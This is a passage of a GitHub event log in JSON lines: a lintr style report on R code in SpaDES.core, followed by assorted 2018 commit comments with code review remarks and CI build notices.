^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-10T21:17:28Z"}
{"id":"7946430451","type":"CommitCommentEvent","actor":{"login":"ntodd"},"repo":{"name":"tim-evans/ember-file-upload"},"payload":{"comment":{"id":29663081,"position":null,"line":null,"path":null,"commit_id":"5d1639e1c412998a7b2ed94a44bc2a1c15286eda","created_at":"2018-07-10T21:17:40Z","updated_at":"2018-07-10T21:17:40Z","author_association":"NONE","body":"It appears this breaks `dragenter` when over a `<body>` element in Firefox and Chrome. See issue #159."}},"created_at":"2018-07-10T21:17:40Z"}
{"id":"7946441587","type":"CommitCommentEvent","actor":{"login":"GabeKuslansky"},"repo":{"name":"jdeurt/Intel"},"payload":{"comment":{"id":29663116,"position":7,"line":7,"path":"src/modules/structures/Player.ts","commit_id":"7087e39f593a5e9f42d7362c08796a8ec221033b","created_at":"2018-07-10T21:20:06Z","updated_at":"2018-07-10T21:20:06Z","author_association":"NONE","body":"Would this ID be separate from the SteamID? "}},"created_at":"2018-07-10T21:20:06Z"}
{"id":"7946447239","type":"CommitCommentEvent","actor":{"login":"PettitWesley"},"repo":{"name":"PettitWesley/amazon-ecs-cli"},"payload":{"comment":{"id":29663127,"position":27,"line":180,"path":"ecs-cli/modules/utils/compose/convert_task_definition.go","commit_id":"071da90aaded24cd207b905cb02e88d2e13d0f6a","created_at":"2018-07-10T21:21:18Z","updated_at":"2018-07-10T21:21:18Z","author_association":"OWNER","body":"ah I see"}},"created_at":"2018-07-10T21:21:18Z"}
{"id":"7946449244","type":"CommitCommentEvent","actor":{"login":"fredkiefer"},"repo":{"name":"gnustep/libs-quartzcore"},"payload":{"comment":{"id":29663129,"position":143,"line":143,"path":"CAAppKitBridge/Source/NSView+CAMethods.m","commit_id":"77cd36a9a1c07c01286b394cd053cc51129a0adf","created_at":"2018-07-10T21:21:46Z","updated_at":"2018-07-10T21:21:46Z","author_association":"MEMBER","body":"You should not be overriding such a general method here."}},"created_at":"2018-07-10T21:21:46Z"}
{"id":"7946455273","type":"CommitCommentEvent","actor":{"login":"fredkiefer"},"repo":{"name":"gnustep/libs-quartzcore"},"payload":{"comment":{"id":29663146,"position":98,"line":98,"path":"CAAppKitBridge/Source/NSView+CAMethods.m","commit_id":"77cd36a9a1c07c01286b394cd053cc51129a0adf","created_at":"2018-07-10T21:23:08Z","updated_at":"2018-07-10T21:23:08Z","author_association":"MEMBER","body":"Please protect this and the following methods against _coreAnimationData being nil."}},"created_at":"2018-07-10T21:23:08Z"}
{"id":"7946456028","type":"CommitCommentEvent","actor":{"login":"tronstronics"},"repo":{"name":"tronstronics/tronsr-template"},"payload":{"comment":{"id":29663147,"position":null,"line":null,"path":null,"commit_id":"1ec3ad1309212e973c07c345fb43d2b356228b8a","created_at":"2018-07-10T21:23:18Z","updated_at":"2018-07-10T21:23:18Z","author_association":"OWNER","body":"![banner](https://user-images.githubusercontent.com/40417942/42538431-88d5706a-845d-11e8-86aa-9cad230d1202.png)\r\n"}},"created_at":"2018-07-10T21:23:18Z"}
{"id":"7946457791","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29663151,"position":22,"line":23,"path":"StockMarket/Program.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T21:23:43Z","updated_at":"2018-07-10T21:23:43Z","author_association":"NONE","body":"Use the Unity container instead. E.g.\r\nvar container = new UnityContainer();\r\nUnityConfig.Register(container);\r\nvar blahService = container.Resolve<BlahService>();\r\n\r\nOr maybe you can find some smarter way?"}},"created_at":"2018-07-10T21:23:43Z"}
{"id":"7946459813","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"alexbgameson/PMMPPlugins"},"payload":{"comment":{"id":29663156,"position":null,"line":null,"path":null,"commit_id":"29360d7a76c995b476fe451096950c2385475ee1","created_at":"2018-07-10T21:24:10Z","updated_at":"2018-07-10T21:24:10Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/alexbgameson/PMMPPlugins/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `950766b6-8487-11e8-814b-f376bf41a437`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T21:24:10Z"}
{"id":"7946460781","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29663160,"position":null,"line":null,"path":null,"commit_id":"03dd4379f8475c6b4bf8d6b48d9d7f7e5a7bca6c","created_at":"2018-07-10T21:24:23Z","updated_at":"2018-07-10T21:24:23Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-327](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-327).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-327-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-10T21:24:23Z"}
{"id":"7946486789","type":"CommitCommentEvent","actor":{"login":"kaizhu256"},"repo":{"name":"rwaldron/tc39-notes"},"payload":{"comment":{"id":29663205,"position":341,"line":341,"path":"es9/2018-05/may-22.md","commit_id":"ad06dc3a9a3855384a5da6d5f48faa9310d03b8b","created_at":"2018-07-10T21:30:06Z","updated_at":"2018-07-10T21:30:06Z","author_association":"NONE","body":"if its a pointless new language syntax, then why should it allowed?  tc39 should set a higher bar for itself for language syntax changes.  a language-feature that's pointless, should not merit consideration for such a consequential language as javascript."}},"created_at":"2018-07-10T21:30:06Z"}
{"id":"7946486970","type":"CommitCommentEvent","actor":{"login":"SvenRoederer"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29663206,"position":null,"line":null,"path":null,"commit_id":"7efb0b77221224303b7759730032829a2590cd64","created_at":"2018-07-10T21:30:08Z","updated_at":"2018-07-10T21:30:08Z","author_association":"CONTRIBUTOR","body":"* can you make the migration work for itself? currently you are extending an other mirgation for this\r\n* what do you think of the commit-text: \r\n  * use the network-options ip[4,6]table to set the routing-table\r\n  * drop the hotplug-script\r\n"}},"created_at":"2018-07-10T21:30:08Z"}
{"id":"7946489639","type":"CommitCommentEvent","actor":{"login":"Counterply"},"repo":{"name":"Counterply/asmFish"},"payload":{"comment":{"id":29663217,"position":6,"line":1253,"path":"x86/Evaluate.asm","commit_id":"3e749a260fe6e21e2822bb0dc0176db12bcc4b06","created_at":"2018-07-10T21:30:39Z","updated_at":"2018-07-10T21:30:39Z","author_association":"OWNER","body":"To be consistent with the C++ code, of course. Your attempt at a patch was incorrect in several places most likely because of variable name mismatches creating confusion. This is due to various non-functional patches that asmFish usually skips.\r\n\r\nSome advice if you are interested in helping in the future:\r\n1) Check for variable name-changes and correct them if possible.\r\n2) Always bench the final binary. For out-of-order patches, you MUST recompile Stockfish (minus the missing patches) and check the bench.\r\n\r\nIf you do these two things, you could save me (or whoever is applying patches) a lot of time when we get to these. For example, I spent nearly two hours trying to get this bench to align, which was much longer than I anticipated. Applying patches -- even \"easy\" ones -- is often a very tedious process that requires one to be organized and meticulous."}},"created_at":"2018-07-10T21:30:39Z"}
{"id":"7946492811","type":"CommitCommentEvent","actor":{"login":"GabeKuslansky"},"repo":{"name":"jdeurt/Intel"},"payload":{"comment":{"id":29663225,"position":16,"line":16,"path":"src/modules/structures/Player.ts","commit_id":"7087e39f593a5e9f42d7362c08796a8ec221033b","created_at":"2018-07-10T21:31:21Z","updated_at":"2018-07-10T21:31:21Z","author_association":"NONE","body":"The reason we had roles as key values before was because we couldn't efficiently work with JSON, Objects or Arrays in MySQL. We're using PostgreSQL now so I think using an ENUM that contains all of the roles a user has might be a cleaner and more readable approach that allows for more efficient development."}},"created_at":"2018-07-10T21:31:21Z"}
{"id":"7946493113","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29663228,"position":null,"line":null,"path":null,"commit_id":"36b453df59d0298ef6faa346cceb617d8f8a1b2a","created_at":"2018-07-10T21:31:26Z","updated_at":"2018-07-10T21:31:26Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-456](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-456).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-456-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-10T21:31:26Z"}
{"id":"7946494048","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29663230,"position":null,"line":null,"path":null,"commit_id":"29c06bb21248b9ff3c3e88891795cab55c7733bb","created_at":"2018-07-10T21:31:39Z","updated_at":"2018-07-10T21:31:39Z","author_association":"CONTRIBUTOR","body":"Thanks!"}},"created_at":"2018-07-10T21:31:39Z"}
{"id":"7946494943","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29663231,"position":null,"line":null,"path":null,"commit_id":"4ed45d12e80b37a6f5c531429722ce771ec66a24","created_at":"2018-07-10T21:31:51Z","updated_at":"2018-07-10T21:31:51Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests - untagged [Build *.*.44.4ed45d12e80b37a6f5c531429722ce771ec66a24](http://build.palaso.org/viewLog.html?buildId=124560&buildTypeId=Glyssen_GlyssenPullRequestsUntagged) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:07:42"}},"created_at":"2018-07-10T21:31:51Z"}
{"id":"7946496411","type":"CommitCommentEvent","actor":{"login":"ulrikpedersen"},"repo":{"name":"areaDetector/ADCore"},"payload":{"comment":{"id":29663234,"position":null,"line":null,"path":null,"commit_id":"6637eaa1a8accf306ce75e49b8beae5b607be2c8","created_at":"2018-07-10T21:32:11Z","updated_at":"2018-07-10T21:32:11Z","author_association":"MEMBER","body":"Building ADCore R3-3-2 `WITH_PVA=YES` and `WITH_QSRV=NO`, EPICS R3.14.12.7 on RHEL7 now works for me. Thanks :+1: \r\n\r\nI haven't quite go to the point of running an areaDetector 3-3 IOC at DLS just yet but hopefully in the next few days..."}},"created_at":"2018-07-10T21:32:11Z"}
{"id":"7946497437","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29663235,"position":null,"line":null,"path":null,"commit_id":"d24f4fce0fe6b970b702d6719aba7e533a2fba83","created_at":"2018-07-10T21:32:25Z","updated_at":"2018-07-10T21:32:25Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-10T21:32:25Z"}
{"id":"7946501783","type":"CommitCommentEvent","actor":{"login":"timwis"},"repo":{"name":"CityOfPhiladelphia/phila.gov-router"},"payload":{"comment":{"id":29663250,"position":7,"line":359,"path":"rules.txt","commit_id":"d0195c71f3405af94af04f2dc65d3c4f318a80d7","created_at":"2018-07-10T21:33:24Z","updated_at":"2018-07-10T21:33:24Z","author_association":"MEMBER","body":"@akennel @vdarlenehill FYI I'm not sure why this would redirect to the open data program page"}},"created_at":"2018-07-10T21:33:24Z"}
{"id":"7946502151","type":"CommitCommentEvent","actor":{"login":"Vaelatern"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29663251,"position":6,"line":6,"path":"srcpkgs/mbox/template","commit_id":"2ea36e362401168914b1815ecb92e584a29b9f41","created_at":"2018-07-10T21:33:29Z","updated_at":"2018-07-10T21:33:29Z","author_association":"CONTRIBUTOR","body":"Agreed"}},"created_at":"2018-07-10T21:33:29Z"}
{"id":"7946504872","type":"CommitCommentEvent","actor":{"login":"lamoliveira"},"repo":{"name":"lamoliveira/test"},"payload":{"comment":{"id":29663259,"position":null,"line":null,"path":null,"commit_id":"7685bf776079844aba3f65ac342c3b04811670f6","created_at":"2018-07-10T21:34:07Z","updated_at":"2018-07-10T21:34:07Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-10T21:34:07Z"}
{"id":"7946509693","type":"CommitCommentEvent","actor":{"login":"lpmagalhaes"},"repo":{"name":"udacity/reactnd-UdaciFitness-complete"},"payload":{"comment":{"id":29663272,"position":54,"line":205,"path":"utils/helpers.js","commit_id":"36d2aef256220a7afb0d537ee37aa09719a394c6","created_at":"2018-07-10T21:35:10Z","updated_at":"2018-07-10T21:35:10Z","author_association":"NONE","body":"Notifications.scheduleLocalNotificationAsync(\r\n\r\nhttps://docs.expo.io/versions/latest/sdk/notifications#exponotificationsschedulelocalnotificationasynclocalnotification-schedulingoptions"}},"created_at":"2018-07-10T21:35:10Z"}
{"id":"7946512958","type":"CommitCommentEvent","actor":{"login":"whitneyscott"},"repo":{"name":"whitneyscott/Star-Wars-API"},"payload":{"comment":{"id":29663276,"position":null,"line":null,"path":null,"commit_id":"719c7aa98fa4feb4686097e2681f3b4e2d9088d9","created_at":"2018-07-10T21:35:53Z","updated_at":"2018-07-10T21:35:53Z","author_association":"OWNER","body":"accepting the commit"}},"created_at":"2018-07-10T21:35:53Z"}
{"id":"7946518214","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29663284,"position":null,"line":null,"path":null,"commit_id":"d75a0703e16f4c36838e11f0cfc9796cd2996acc","created_at":"2018-07-10T21:37:00Z","updated_at":"2018-07-10T21:37:00Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-10T21:37:00Z"}
{"id":"7946519980","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/szlaszlo1"},"payload":{"comment":{"id":29663302,"position":71,"line":93,"path":"Week 8/DAY4/TodoAppVol3/TodoAppVol3/Controllers/TodoController.cs","commit_id":"359a8898a82ba7e312f566ea73c2f50605dfcdbe","created_at":"2018-07-10T21:37:23Z","updated_at":"2018-07-10T21:37:23Z","author_association":"NONE","body":"I tried to find you TodoApp, but you have a lot of version. Anyway, try to you use understandable variable names, todoService, etc, it's not too sexy now :)"}},"created_at":"2018-07-10T21:37:23Z"}
